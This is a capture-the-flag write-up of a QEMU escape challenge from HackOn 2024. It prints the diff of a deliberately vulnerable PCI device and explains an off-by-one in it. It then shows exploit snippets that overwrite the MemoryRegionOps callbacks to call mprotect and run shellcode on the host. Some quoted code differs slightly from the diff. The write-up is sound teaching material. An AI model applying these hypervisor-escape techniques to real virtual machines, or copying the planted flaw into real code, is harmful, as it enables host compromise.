ZEROCLICK

Quememu Writeup HackOn 2024 CTF

April 14, 2024
15 min read
Table of Contents

Intro

Challenge Preview

We created a few challenges for the HackOn CTF. One of them was a Qemu Escape challenge. To obtain the flag, the user must escape Qemu and read the flag that’s located in the host.

In this post, we are going to explain in depth how to solve the challenge. You can download the challenge here.

Understanding the provided info

In this challenge, we can see a few files:

~/Downloads/quememu » tree
.
├── Dockerfile
├── deploy_docker.sh
├── diff.txt
├── docker-compose.yml
├── flag
├── initramfs.cpio.gz
├── pc-bios
    ...
├── qemu-system-x86_64
├── run.sh
├── vmlinuz-5.15.0-92-generic
└── xinetd

The file diff.txt sounds interesting. Let’s see its content:

commit 40192e9557fccd3982e17d533fae9f1b0103624d
Author: Pwnkebab <pwnkebab@gmail.com>
Date:   Tue Feb 6 16:13:11 2024 +0000
 
    QueMemu device
 
diff --git a/hw/misc/meson.build b/hw/misc/meson.build
index e4ef1da5a5..022755ced9 100644
--- a/hw/misc/meson.build
+++ b/hw/misc/meson.build
@@ -153,6 +153,8 @@ specific_ss.add(when: 'CONFIG_MIPS_CPS', if_true: files('mips_cmgcr.c', 'mips_cp
 specific_ss.add(when: 'CONFIG_MIPS_ITU', if_true: files('mips_itu.c'))
 
 system_ss.add(when: 'CONFIG_SBSA_REF', if_true: files('sbsa_ec.c'))
+system_ss.add(files('quememu.c'))
+
 
 # HPPA devices
 system_ss.add(when: 'CONFIG_LASI', if_true: files('lasi.c'))
diff --git a/hw/misc/quememu.c b/hw/misc/quememu.c
new file mode 100644
index 0000000000..c4c0b2ca77
--- /dev/null
+++ b/hw/misc/quememu.c
@@ -0,0 +1,176 @@
+#include "qemu/osdep.h"
+#include "qemu/units.h"
+#include "hw/pci/pci.h"
+#include "hw/hw.h"
+#include "hw/pci/msi.h"
+#include "qemu/timer.h"
+#include "qom/object.h"
+#include "qemu/module.h"
+#include "qapi/visitor.h"
+#include <math.h>
+
+#define TYPE_PCI_QUEMEMU_DEVICE "quememu"
+#define QUEMEMU_MMIO_SIZE 0x10000
+#define BUFF_SIZE 0x10000
+#define MAX_BASE 20
+#define MAX_RW BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)
+
+typedef unsigned char base_t;
+
+typedef struct{
+    PCIDevice pdev;
+    MemoryRegion mmio;
+    char buff[BUFF_SIZE];
+    struct {
+        base_t base;
+        short off;
+		hwaddr src;
+	} state;
+} QueMemuState;
+
+DECLARE_INSTANCE_CHECKER(QueMemuState, QUEMEMU, TYPE_PCI_QUEMEMU_DEVICE)
+
+static unsigned char consume_nibble(unsigned short *n)
+{
+	unsigned char nibble = *n<<4;
+	nibble = nibble>>4;
+	*n = *n>>4;
+
+	return nibble;
+}
+
+static void trigger_rw(QueMemuState *quememu, bool is_write)
+{
+    if (quememu->state.base == 0)
+        return;
+
+    if (quememu->state.base == 0x10) // Don't change base cause we already use base 16
+    {
+        cpu_physical_memory_rw(quememu->state.src, &quememu->buff[quememu->state.off], MAX_RW, is_write);
+        return;
+    }
+
+    unsigned short n = quememu->state.off;
+	unsigned long long multiplier = 1, new_off = 0;
+
+	for (int i = 0; i < sizeof(n)*2; ++i)
+	{
+        // Use nibble % base (e.g. 7 in base 3 = 1)
+        new_off += (consume_nibble(&n) % quememu->state.base) * multiplier;
+		multiplier *= quememu->state.base;
+	}
+    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
+}
+
+static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
+    QueMemuState *quememu = (QueMemuState *)opaque;
+    uint64_t val = 0;
+    switch (addr)
+    {
+        case 0x00:
+            trigger_rw(quememu, 1);
+            break;
+        case 0x04:
+            val = quememu->state.base;
+            break;
+        case 0x08:
+            val = quememu->state.off;
+            break;
+        case 0x0c:
+            val = quememu->state.src;
+            break;
+        default:
+            val = 0xFABADA;
+            break;
+    }
+    return val;
+}
+
+static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
+    QueMemuState *quememu = (QueMemuState *)opaque;
+    switch (addr)
+    {
+        case 0x00:
+            trigger_rw(quememu, 0);
+            break;
+        case 0x04:
+            if ((base_t) val <= MAX_BASE) quememu->state.base = val;
+            break;
+        case 0x08:
+            if ((short) val >= 0) quememu->state.off = val;
+            break;
+        case 0x0c:
+            quememu->state.src = val;
+            break;
+        default:
+            break;
+    }
+}
+
+static const MemoryRegionOps quememu_mmio_ops =
+{
+    .read = quememu_mmio_read,
+    .write = quememu_mmio_write,
+    .endianness = DEVICE_NATIVE_ENDIAN,
+    .valid =
+    {
+        .min_access_size = 4,
+        .max_access_size = 4,
+    },
+    .impl =
+    {
+        .min_access_size = 4,
+        .max_access_size = 4,
+    },
+};
+
+static void pci_quememu_realize(PCIDevice *pdev, Error **errp)
+{
+    QueMemuState *quememu = QUEMEMU(pdev);
+    memory_region_init_io(&quememu->mmio, OBJECT(quememu), &quememu_mmio_ops, quememu, "quememu-mmio", QUEMEMU_MMIO_SIZE);
+    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &quememu->mmio);
+}
+
+static void quememu_instance_init(Object *obj)
+{
+    QueMemuState *quememu = QUEMEMU(obj);
+    memset(&quememu->state, 0, sizeof(quememu->state));
+    memset(quememu->buff, 0, sizeof(quememu->buff));
+}
+
+static void quememu_class_init(ObjectClass *class, void *data)
+{
+    DeviceClass *dc = DEVICE_CLASS(class);
+    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
+    k->realize = pci_quememu_realize;
+    k->vendor_id = PCI_VENDOR_ID_QEMU;
+    k->device_id = 0xFACE;
+    k->revision = 0x0;
+    k->class_id = PCI_CLASS_OTHERS;
+
+    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
+}
+
+static void pci_quememu_register_types(void)
+{
+    static InterfaceInfo interfaces[] =
+    {
+        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
+        { },
+    };
+    static const TypeInfo quememu_info =
+    {
+        .name = TYPE_PCI_QUEMEMU_DEVICE,
+        .parent = TYPE_PCI_DEVICE,
+        .instance_size = sizeof(QueMemuState),
+        .instance_init = quememu_instance_init,
+        .class_init = quememu_class_init,
+        .interfaces = interfaces,
+    };
+
+    type_register_static(&quememu_info);
+}
+
+type_init(pci_quememu_register_types)

As you can see, a new device has been added /hw/misc/quememu.c. Also, the qemu-system-x86_64 has been compiled including this device (meson.build).

Analyzing the device

In the pci_quememu_register_types function, the device is registered:

static void pci_quememu_register_types(void)
{
    static InterfaceInfo interfaces[] =
    {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo quememu_info =
    {
        .name = TYPE_PCI_quememu_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(quememuState),
        .instance_init = quememu_instance_init,
        .class_init = quememu_class_init,
        .interfaces = interfaces,
    };
 
    type_register_static(&quememu_info);
}
 
type_init(pci_quememu_register_types)

In the quememu_class_init function there are defined some characteristics of the device like the device id (0xFACE) which is going to be useful to identify the device:

static void quememu_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
    k->realize = pci_quememu_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xFACE;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;
 
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

Also, in the pci_quememu_realize function we can see that an MMIO region is registered. This region is going to allow us to do I/O operations between the virtual machine and the device:

static void pci_quememu_realize(PCIDevice *pdev, Error **errp)
{
    QueMemuState *quememu = QUEMEMU(pdev);
    memory_region_init_io(&quememu->mmio, OBJECT(quememu), &quememu_mmio_ops, quememu, "quememu-mmio", QUEMEMU_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &quememu->mmio);
}

When memory_region_init_io is called, the quememu_mmio_ops structure is passed as an argument.

This structure defines the callbacks. Each time a read or write is to be performed, the callbacks will be executed:

static const MemoryRegionOps quememu_mmio_ops =
{
    .read = quememu_mmio_read,
    .write = quememu_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid =
    {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl =
    {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

The function associated with the read is quememu_mmio_read:

static uint64_t quememu_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    QueMemuState *quememu = (QueMemuState *)opaque;
    uint64_t val = 0;
    switch (addr)
    {
        case 0x00:
            trigger_rw(1);
            break;
        case 0x04:
            val = quememu->state.base;
            break;
        case 0x08:
            val = quememu->state.off;
            break;
        case 0x0c:
            val = quememu->state.src;
            break;
        default:
            val = 0xFABADA;
            break;
    }
    return val;
}

And the function associated with the write is quememu_mmio_write:

static void quememu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    QueMemuState *quememu = (QueMemuState *)opaque;
    switch (addr)
    {
        case 0x00:
            trigger_rw(0);
            break;
        case 0x04:
            if ((base_t) val <= MAX_BASE) quememu->state.base = val;
            break;
        case 0x08:
            if ((short) val >= 0) quememu->state.off = val;
            break;
        case 0x0c:
            quememu->state.src = val;
            break;
        default:
            break;
    }
}

As you can see, in this function we can define the offset, the source, and the base of the state structure. Also, in both functions, option 0 will call trigger_rw.

static void trigger_rw(bool is_write)
{
    if (quememu->state.base = 0x10) // Don't change base cause we already use base 16
    {
        cpu_physical_memory_rw(quememu->state.src, &quememu->buff[&quememu->state.off], MAX_RW, is_write);
        return;
    }
 
    short n = quememu->state.off;
	unsigned long long multiplier = 1, new_off = 0;
 
	for (int i = 0; i < sizeof(n)*2; ++i)
	{
        // Use nibble % base (e.g. 7 in base 3 = 1)
        new_off += (consume_nibble(&n) % quememu->state.base) * multiplier;
		multiplier *= quememu->state.base;
	}
    cpu_physical_memory_rw(quememu->state.src, &quememu->buff[new_off], MAX_RW, is_write);
}

This function may seem a bit confusing at first glance. Let’s analyze it in detail.

First of all, we must understand how the QueMemuState structure is defined:

typedef unsigned char base_t;
 
typedef struct{
    PCIDevice pdev;
    MemoryRegion mmio;
    char buff[BUFF_SIZE];
    struct {
        base_t base;
        short off;
		hwaddr src;
	} state;
} QueMemuState;

It contains a struct (state) that has a base (unsigned char), offset (short), and src (hwaddr). In addition, there is a mmio variable of type MemoryRegion. If we look at the documentation, we see that:

Memory is modelled as an acyclic graph of MemoryRegion objects. Sinks (leaves) are RAM and MMIO regions, while other nodes represent buses, memory controllers, and memory regions that have been rerouted. There are multiple types of memory regions (all represented by a single C type MemoryRegion)…

So, it is an abstraction that represents the different memory areas inside the virtual machine. If we combine it with what we have seen in the pci_quememu_realize function and with the following point of the documentation we can understand it a little better:

MMIO: a range of guest memory that is implemented by host callbacks; each read or write causes a callback to be called on the host. You initialize these with memory_region_init_io, passing it a MemoryRegionOps structure describing the callbacks.

Going back to the trigger_rw function, if the base is 0x10 nothing special will happen, a simple call to cpu_physical_memory_rw will be made. In other case, the new_off will be calculated. For example, if the base is 20 and the offset is 0x1234 the algorithm will do the following:

new_off = 0x4 * (20 ** 0)
new_off += 0x3 * (20 ** 1)
new_off += 0x2 * (20 ** 2)
new_off += 0x1 * (20 ** 3)

So, new_off = 0x22a0. To sum up, the offset is interpreted in the base that we have provided and converted to hex. Let’s check it:

Convert Base

Identifying the vulnerabilities

Now that we understand how the device works, we can start identifying the vulnerabilities.

In the trigger_rw function, the len used in cpu_physical_memory_rw is MAX_RW which is defined as follows:

#define BUFF_SIZE 0x10000
#define MAX_BASE 20
#define MAX_RW BUFF_SIZE - (pow(MAX_BASE,3)*0x7 + pow(MAX_BASE,2)*0xF + MAX_BASE*0xF + 0xF - 1)

So, MAX_RW = 0x10000 - 62314 = 3222

Knowing that buff has a size of 0x10000 and the largest offset we can achieve is 0x7fff because state.off is a short. Moreover, the largest base is 20. In this case, the value of new_off is 62315:

new_off = 0xf * (20 ** 0)
new_off += 0xf * (20 ** 1)
new_off += 0xf * (20 ** 2)
new_off += 0x7 * (20 ** 3)

So, we have an off by one!!

The cpu_physical_memory_rw function will write to or read from quememu->buff[62315] 3222 bytes which means that we are writing/reading from [62315, 0x10001].

The next question is, what can we modify with this off by one?

If you take a look at the QueMemuState structure, after the buff variable comes the base attribute and since the base <= MAX_BASE check is only done in the quememu_mmio_write function with the 0x4 option, we can put an arbitrary base and get a bigger overflow.

Now, for example, we can modify the offset. Nevertheless, what’s our plan?

If we were able to modify the offset to a negative value, we could read or write to the MemoryRegion.

gef➤  ptype /ox MemoryRegion
type = struct MemoryRegion {
/* 0x0000      |  0x0028 */    Object parent_obj;
/* 0x0028      |  0x0001 */    _Bool romd_mode;
/* 0x0029      |  0x0001 */    _Bool ram;
/* 0x002a      |  0x0001 */    _Bool subpage;
/* 0x002b      |  0x0001 */    _Bool readonly;
/* 0x002c      |  0x0001 */    _Bool nonvolatile;
/* 0x002d      |  0x0001 */    _Bool rom_device;
/* 0x002e      |  0x0001 */    _Bool flush_coalesced_mmio;
/* 0x002f      |  0x0001 */    _Bool unmergeable;
/* 0x0030      |  0x0001 */    uint8_t dirty_log_mask;
/* 0x0031      |  0x0001 */    _Bool is_iommu;
/* XXX  6-byte hole      */
/* 0x0038      |  0x0008 */    RAMBlock *ram_block;
/* 0x0040      |  0x0008 */    Object *owner;
/* 0x0048      |  0x0008 */    DeviceState *dev;
/* 0x0050      |  0x0008 */    const MemoryRegionOps *ops;
/* 0x0058      |  0x0008 */    void *opaque;
/* 0x0060      |  0x0008 */    MemoryRegion *container;
/* 0x0068      |  0x0004 */    int mapped_via_alias;
...
/* total size (bytes):  272 */
}

The MemoryRegionOps seems familiar to you, right?

If not, review the quememu_mmio_ops.

The structure of MemoryRegionOps is as follows:

gef➤  ptype /ox MemoryRegionOps
type = struct MemoryRegionOps {
/* 0x0000      |  0x0008 */    uint64_t (*read)(void *, hwaddr, unsigned int);
/* 0x0008      |  0x0008 */    void (*write)(void *, hwaddr, uint64_t, unsigned int);
/* 0x0010      |  0x0008 */    MemTxResult (*read_with_attrs)(void *, hwaddr, uint64_t *, unsigned int, MemTxAttrs);
/* 0x0018      |  0x0008 */    MemTxResult (*write_with_attrs)(void *, hwaddr, uint64_t, unsigned int, MemTxAttrs);
/* 0x0020      |  0x0004 */    enum device_endian endianness;
/* XXX  4-byte hole      */
/* 0x0028      |  0x0018 */    struct {
/* 0x0028      |  0x0004 */        unsigned int min_access_size;
/* 0x002c      |  0x0004 */        unsigned int max_access_size;
/* 0x0030      |  0x0001 */        _Bool unaligned;
/* XXX  7-byte hole      */
/* 0x0038      |  0x0008 */        _Bool (*accepts)(void *, hwaddr, unsigned int, _Bool, MemTxAttrs);
 
                                   /* total size (bytes):   24 */
                               } valid;
/* 0x0040      |  0x000c */    struct {
/* 0x0040      |  0x0004 */        unsigned int min_access_size;
/* 0x0044      |  0x0004 */        unsigned int max_access_size;
/* 0x0048      |  0x0001 */        _Bool unaligned;
/* XXX  3-byte padding   */
 
                                   /* total size (bytes):   12 */
                               } impl;
/* XXX  4-byte padding   */
 
                               /* total size (bytes):   80 */
}

Great, so if we can read and write to MemoryRegionOps we can modify the callbacks and escape.

In the trigger_rw function, the new_off is unsigned so we can’t achieve our goal directly. However, if the base is 0x10 there is no base conversion so the offset is quememu->state.off which is a short. Now we have everything we need to get arbitrary read/write:

  1. Trigger the off by one and modify the base to have a bigger overflow.
  2. Modify the offset to point anywhere we want (in this case to the MemoryRegion structure).
  3. Set the base to 0x10 to avoid unsigned short and interpret negative values correctly in the offset.

In our case, if we set the base to 21 (MAX_BASE+1) we have to set the offset to, at least, 0x6f6b. To calculate that number, we first calculated the offset needed to reach up to an offset of 0x10004 (in hexadecimal) from the buffer, and then translated it to base 21. The reason why we have to get to at least 0x10004 and not 0x10003 is because there is a 1 byte padding between the base attribute and the off attribute:

gef➤  ptype/xo QueMemuState*
type = struct {
/* 0x0000      |  0x0a30 */    PCIDevice pdev;
/* 0x0a30      |  0x0110 */    MemoryRegion mmio;
/* 0x0b40      | 0x10000 */    char buff[65536];
/* 0x10b40     |  0x0010 */    struct {
/* 0x10b40     |  0x0001 */        base_t base;
/* XXX  1-byte hole      */
/* 0x10b42     |  0x0002 */        short off;
/* XXX  4-byte hole      */
/* 0x10b48     |  0x0008 */        hwaddr src;
 
                                   /* total size (bytes):   16 */
                               } state;
                               /* total size (bytes): 68432 */
} *

So knowing that we want to reach to 0x10004 and that the amount written is 3222 bytes (as shown previously), the offset we need to set is 0x10004-3222 = 0xf36e which in base 21 is 0x6f6b:

def hex2base(n, base):
    new_off = ""
    while n > 0:
        tmp = n % base
        new_off += f"{tmp:x}"
        n //= base
    return "0x" + new_off[::-1]
 
if __name__ == "__main__":
    print(hex2base(0xf36e, 21))
$ python3 base_converter.py
0x6f6b

Explotation estrategy

Now that we know how to escalate the off by one bug, and end up reading or writing to the mmio (MemoryRegion) atribute, we have to use that to read the flag. As we said earlier, our estrategy to do that will consist on achieving code execution by modifying the read and write callbacks with anything we want. In this case we will overwrite the write callback to call mprotect and the read callback to point to a controlled buffer (the buff atribute) where we will have our final shellcode that just opens the flag, reads from it and writes it to stdout. However, we have to solve another problem, which is our inability to directly control the first argument passed to mprotect, because the callback’s first argument is always void *opaque.

Before any of that, we obviously need to leak some addresses, in this case we only need to know what is the address of mprotect (or mprotect@plt) and what is the address of the buffer. We can know the address of mprotect@plt just by leaking any pie address and adding/subtracting offsets, in this case we will use the const MemoryRegionOps *ops atribute which, as we can see, is a pie address:

gef➤  p quememu->mmio
$2 = {
  parent_obj = {
    class = 0x555556e83490,
    free = 0x0,
    properties = 0x555557d03b60Python Exception <class 'gdb.error'>: There is no member named keys.
,
    ref = 0x1,
    parent = 0x555557d91230
  },
  romd_mode = 0x1,
  ram = 0x0,
  subpage = 0x0,
  readonly = 0x0,
  nonvolatile = 0x0,
  rom_device = 0x0,
  flush_coalesced_mmio = 0x0,
  unmergeable = 0x0,
  dirty_log_mask = 0x0,
  is_iommu = 0x0,
  ram_block = 0x0,
  owner = 0x555557d91230,
  dev = 0x555557d91230,
  ops = 0x555556a4b460 <quememu_mmio_ops>,
  opaque = 0x555557d91230,
  container = 0x555556f1e6e0,
  mapped_via_alias = 0x0,
...
}
gef➤  vmmap 0x555556a4b460
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x000055555622e000 0x0000555556c05000 0x0000000000cd9000 r-- ./qemu-system-x86_64

The address of the buffer can be calculated based on the address of the whole QueMemuState structure, which we can obtain from the atribute owner.

For the final part of the exploit we have to setup a fake MemoryRegionOps structure and overwrite the ops atribute from the MemoryRegion to point to it:

void setup_fake_ops(char *hva_mprotect_plt, char *hva_qmemu_buff)
{
	*(void **)(gva_buff + MREG_SIZE) = hva_qmemu_buff+0x60; // fake read
	*(void **)(gva_buff + MREG_SIZE + 0x8) = hva_mprotect_plt; // fake write
	memcpy(gva_buff + MREG_SIZE+0x60, shellcode, SHELLCODE_SIZE);
}
 
void overwrite_ops(char *hva_mprotect_plt, char *hva_qmemu_buff)
{
	setup_fake_ops(hva_mprotect_plt, hva_qmemu_buff);
	*(void **)(gva_buff + MREG_OPS_OFF) = hva_qmemu_buff;
	*(void **)(gva_buff + MREG_OPAQUE_OFF) = (void *)(((uint64_t)hva_qmemu_buff+0x60)/0x1000*0x1000);
	mmio_write(trigger, 0);
}

In our exploit the setup_fake_ops function will create the fake structure in gva_buff[MREG_SIZE]. Remember that anything we have in our guest buffer will be copied (once triggered the write callback) to the place where the MemoryRegion mmio is located, and by writing our fake ops in a MREG_SIZE offset from gva_buff they will end up in the qememu buff. We have done this to ensure that we don’t overwrite anything useful from mmio. Our fake ops will first contain a pointer to hva_qmemu_buff+0x60 (which is where we place our shellcode) and then a pointer to the address of mprotect@plt. This two pointers will mock the read and write callbacks respectively. Finally, we copy our shellcode to gva_buff[MREG_SIZE+0x60] wich remeber that will end up in buff[0x60] in the quememu structure.

Having setup the fake ops we can now overwrite the pointer to the MemoryRegionOps with hva_qmemu_buff, which as we explained earlier is where our fake ops will end up. To be able to correctly pass the first argument to mprotect we have to also overwrite the opaque atribute with a pointer to the page where our shellcode will end up.

Once we trigger the write, we will have the following layout:

Memory Layout

Lastly, we call mprotect and our shellcode, and we get the flag:

...
	// call mprotect
	mmio_write(0x1000,  PROT_READ | PROT_WRITE | PROT_EXEC);
	// win :)
	puts("[*] PWNED!");
	mmio_read(trigger);
...

Executing the exploit

You can find the complete exploit at this link.

If we run the exploit, we can successfully read the flag that is located outside Qemu:

Result flag